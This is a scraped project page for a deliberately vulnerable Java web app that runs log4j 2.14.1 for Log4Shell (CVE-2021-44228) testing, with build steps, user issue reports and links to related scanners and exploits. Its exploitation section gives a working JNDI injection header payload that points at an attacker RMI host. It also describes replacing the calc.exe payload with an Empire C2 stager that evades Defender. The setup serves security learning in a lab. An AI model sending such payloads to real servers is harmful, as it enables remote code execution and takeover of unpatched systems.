A Basic Java Application Vulnerable to the Log4Shell RCE

Last update: Nov 9, 2022

Related tags

Overview

log4shell vulnerable app

This is a basic, minimal, intentionally vulnerable Java web application including a version (2.14.1) of the log4j library affected by the infamous log4shell (CVE-2021-44228) vulnerability.

build and run instructions

Gradle wrapper should solve everything. Simply git clone the repo:

git clone https://github.com/tothi/log4shell-vulnerable-app

And in the project dir with the file build.gradle, simply run:

./gradlew appRun

or on Windows platform:

.\gradlew.bat appRun

(JDK is needed.)

The vulnerable application should listen on all interfaces by default (DANGEROUS behavior if you run it on a production box).

It is available on the URL:

http://
   
    :8888/app/

Note, that the log4j vulnerability triggers only when the app performs some log4j logging activity. In this demo app, it is active when accessing the URL:

http://
   
    :8888/app/servlet

and passing a string in the Header "x-log". (This is what gets logged.) For example, using curl:

curl http://
   
    :8888/app/servlet -H 'x-log: 
    
     '

This highlights that detecting the log4j vulnerability is not obvious at all.

exploiting the RCE

Here are some instructions on how to exploit the RCE (even on up-to-date default Java configurations with TrustURLCodebase set to false). Tested on Linux and Windows with Java 11.0.1[23].

Simply use the JNDI Injection Exploit Kit by welk1n or a more recent fork by pimps.

Steps to perform (in this example, target host is 192.168.56.101 and attacker gost is 192.168.56.1):

Launch the vulnerable web app with .\gradlew.bat appRun. It listens on 192.168.56.101:8888 and uses Tomcat 8.5 as a backend. Tomcat 8 (in the classpath) is mandatory for the javax.el.ELProcessor RMI exploit path (supported by the current version of the JNDI Injection Exploit Kit).
Launch the JNDI Injection Exploit Kit on the attacker host after building with mvn package with java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C 'calc.exe' (the payload will execute calc.exe on the target). Helper servers are started now on 192.168.56.1. Assuming the RMI url for trustURLCodeBase false config is rmi://192.168.56.1:1099/xzmtee.
Trigger the exploit by sending the malicious payload through the "x-log" header: curl http://192.168.56.101:8888/app/servlet -H 'x-log: ${jndi:rmi://192.168.56.1:1099/xzmtee}
The app should use the vulnerable log4j for logging the contents of the "x-log" header. While logging, it looks up the referenced RMI URL, and the JNDI Kit sends the RCE payload classloading reference.
Note, that instead of logging the actual content of the "x-log" header, the referenced class name ("javax.el.ELProcessor") gets logged.
On the target host, calc.exe should be spawned, reaching RCE.

UPDATE: here is an extra PoC screenshot for those who are curious and doubt whether launching a calc.exe is useful for anything at all. In this screenshot, replaced the calc.exe payload with an Empire stager giving a full featured C2 Empire Agent (also bypassing up-to-date Windows Defender).

PCRE RegEx matching Log4Shell CVE-2021-44228 IOC in your logs

Log4Shell-Rex The following RegEx was written in an attempt to match indicators of a Log4Shell (CVE-2021-44228 and CVE-2021-45046) exploitation. If yo

Nov 9, 2022

OACC (Object ACcess Control) is an advanced Java Application Security Framework

OACC Java Application Security Framework What is OACC? OACC - pronounced [oak] - is a fully featured API to both enforce and manage your application's

Nov 24, 2022

A desktop java GUI application to encrypt your plain text

Sep 10, 2022

Hdiv CE | Application Self-Protection

New to Hdiv? Check this out Hdiv: Application Self-Protection Hdiv is a leading provider of open source software for real-time, self-protected applica

Nov 14, 2022

This application can recognize the sign language alphabets and help people who do not understand sign language to communicate with the speech and hearing impaired.

Sign Language Recognition App This application can recognize the sign language alphabets and help people who do not understand sign language to commun

Oct 7, 2021

Spring boot application to display number of corona cases

Corona-Cases-Counter Spring boot application to display number of corona cases This application consumes data from a CSV file which was used to docume

Aug 29, 2021

First Blood Donor Application

Find Blood Donor This is an android application which helps users to find blood donor's in their nearby locality. Why did you made this? My project "F

Oct 7, 2021

Make a customized list of exercises, create and save workouts, and be led through your routine. This application is currently under development.

HIIT Workout Builder ABOUT This application allows you to create and be led through customized high-intensity interval training (HIIT) sessions. The a

Nov 28, 2022

Library to easily configure API Key authentication in (parts of) your Spring Boot Application

42 API Key Authentication A library to easily configure API Key authentication in (parts of) your Spring Boot Application. Features Easily configure A

Dec 8, 2021

Comments

Having trouble with the listening port

Hello,

When I run the program on Windows, I get this far:

Exception in thread "Thread-128" org.gradle.process.internal.ExecException: Process 'command 'C:\Program Files\Java\jdk-17.0.1\bin\java.exe'' finished with non-zero exit value 1 at org.gradle.process.internal.DefaultExecHandle$ExecResultImpl.assertNormalExitValue(DefaultExecHandle.java:414) at org.gradle.process.internal.DefaultJavaExecAction.execute(DefaultJavaExecAction.java:52) at org.gradle.process.internal.DefaultExecActionFactory.javaexec(DefaultExecActionFactory.java:198) at org.gradle.api.internal.project.DefaultProject.javaexec(DefaultProject.java:1156) at org.gradle.api.internal.project.DefaultProject.javaexec(DefaultProject.java:1151) at org.gradle.api.Project$javaexec$6.call(Unknown Source) <===========--> 87% EXECUTING [46s]ltLauncher.javaExec(DefaultLauncher.groovy:100) at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method) <===========--> 87% EXECUTING [45s]eflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:77) at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) <===========--> 87% EXECUTING [44s]ect.Method.invoke(Method.java:568) at org.codehaus.groovy.reflection.CachedMethod.invoke(CachedMethod.java:107) <===========--> 87% EXECUTING [43s]oMethodInvoke(MetaMethod.java:323) at org.codehaus.groovy.runtime.metaclass.ClosureMetaClass.invokeMethod(ClosureMetaClass.java:362) <===========--> 87% EXECUTING [41s]ime.callsite.PogoMetaClassSite.callCurrent(PogoMetaClassSite.java:61) at org.codehaus.groovy.runtime.callsite.AbstractCallSite.callCurrent(AbstractCallSite.java:185) <===========--> 87% EXECUTING [39s]herBase$_launchThread_closure3.doCall(LauncherBase.groovy:197) at org.akhikhl.gretty.LauncherBase$_launchThread_closure3.doCall(LauncherBase.groovy) <===========--> 87% EXECUTING [16s]eflect.NativeMethodAccessorImpl.invoke0(Native Method) at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:77) <===========--> 87% EXECUTING [53s]eflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) at java.base/java.lang.reflect.Method.invoke(Method.java:568) <===========--> 87% EXECUTING [14s]ection.CachedMethod.invoke(CachedMethod.java:107) at groovy.lang.MetaMethod.doMethodInvoke(MetaMethod.java:323) <===========--> 87% EXECUTING [13s]ime.metaclass.ClosureMetaClass.invokeMethod(ClosureMetaClass.java:274) at groovy.lang.MetaClassImpl.invokeMethod(MetaClassImpl.java:1035) <===========--> 87% EXECUTING 12s at groovy.lang.Closure.call(Closure.java:406) <===========--> 87% EXECUTING [11s]Closure.java:493) at java.base/java.lang.Thread.run(Thread.java:833) <===========--> 87% EXECUTING [10s]

:appRun

But I don't see the port listening and I can't connect to it manually.

What am I missing?

opened by Pwdrkeg 1
gretty not found in Gradle Central Plugin Repo
I could definitely be missing something here, but when I do the build step './gradlew appRun' I receive the following error:

FAILURE: Build failed with an exception.

Where: Build file '[REDACTED]/log4shell-vulnerable-app/build.gradle' line: 3

What went wrong: Plugin [id: 'org.gretty', version: '3.0.5'] was not found in any of the following sources:

Gradle Core Plugins (plugin is not in 'org.gradle' namespace)

Plugin Repositories (could not resolve plugin artifact 'org.gretty:org.gretty.gradle.plugin:3.0.5') Searched in the following repositories: Gradle Central Plugin Repository

I'm using JDK 8 and Ubuntu 14.04 intentionally.

Is this a problem on my end?
opened by kbmulligan 3

Releases(v1.0.0)

v1.0.0(Feb 4, 2022)

Source code(tar.gz)
Source code(zip)
log4shell-vulnerable-app-all.jar(8.34 MB)

Owner

GitHub

A mitigation for CVE-2021-44228 (log4shell) that works by patching the vulnerability at runtime. (Works with any vulnerable java software, tested with java 6 and newer)

Log4jPatcher A Java Agent based mitigation for Log4j2 JNDI exploits. This agent employs 2 patches: Disabling all Lookup conversions (on supported Log4

45 Dec 16, 2022

Log4shell-hunter - Scanner that scans local files for log4shell vulnerability

Log4shell-hunter - Scanner that scans local files for log4shell vulnerability. Does bytecode analysis so it does not rely on metadata. Will find vulnerable log4j even it has been self-compiled/repackaged/shaded/nested (e.g. uberjar, fatjar) and even obfuscated.

5 Feb 27, 2022

Log4Shell RCE exploit using a gadget class. Not dependent on an old JDK version to work.

8 Jan 4, 2022

An LDAP RCE exploit for CVE-2021-44228 Log4Shell

log4j-poc An LDAP RCE exploit for CVE-2021-44228 Log4Shell Description The demo Tomcat 8 server on port 8080 has a vulnerable app (log4shell) deployed

60 Dec 10, 2022

Log4J scanner that detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046, etc) on your file-system within any application. It is able to even find Log4J instances that are hidden several layers deep. Works on Linux, Windows, and Mac, and everywhere else Java runs, too!

Log4-detector Scanner that detects vulnerable Log4J versions to help teams assess their exposure to CVE-2021-44228 (CRITICAL), CVE-2021-45046, CVE-202

623 Dec 26, 2022